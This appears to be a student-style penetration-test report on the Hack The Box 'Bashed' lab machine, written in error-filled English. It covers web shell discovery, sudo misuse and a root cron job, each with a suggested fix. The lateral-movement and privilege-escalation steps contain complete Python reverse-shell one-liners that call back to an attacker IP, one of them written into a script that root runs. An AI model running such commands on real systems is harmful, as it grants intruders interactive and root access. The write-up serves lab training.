Report - HTB bashed Report

1. port scan result

 

IP Address	Port
10.10.10.68	80

 

2. initial access - phpbash.php

 

Vulnerability Explanation :I have scanned the port . i used gobuster to find directorys. i finded phpbash.php in /var directory. this php file was server bash program as www-data user. there is picture below

Vulnerability Fix : if it is possibe, delete phpbashe.php file

Severity : critical, 

Steps to reproduce the attack : upload reverse_web_shell to /uploads and connect /uploads/reverse_web_shell. i get reverse shell.

 

Post-Expolation :there is screenshot below

 

3. lateral movement - vulnability sudo option

Vulnerability Explanation :i scan vulnerability to lateral movement. i find out that i can use privilege as scriptmanager due to "sudo -l command"

screenshot :

this option is www-data user can use to escalate privilege as scriptmanager in no password.

Vulnerability Fix : Fix sudoers file to delete no password

 

Severity : critical

Steps to reproduce the attack : 

sudo -u scriptmanager python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

screenshot:

post-exploitation :

 

4. Privilege Escalation - root cronjob vulnabliity

Vulnerability Explanation : this vulnarability is misconfig cornjob as root. i scaned file about scriptmanager and find /scripts directory. i change directory into /scripts. i scaned files. i find out that root execute test.py regulary. but, the test.py privilege to write is scriptmanager.

 

Vulnerability Fix : change owner test.py to root

 

Severity : critical

Steps to reproduce the attack :

execute command below

echo "import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.4',447));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/sh')" > test.py

 

post-exploitation :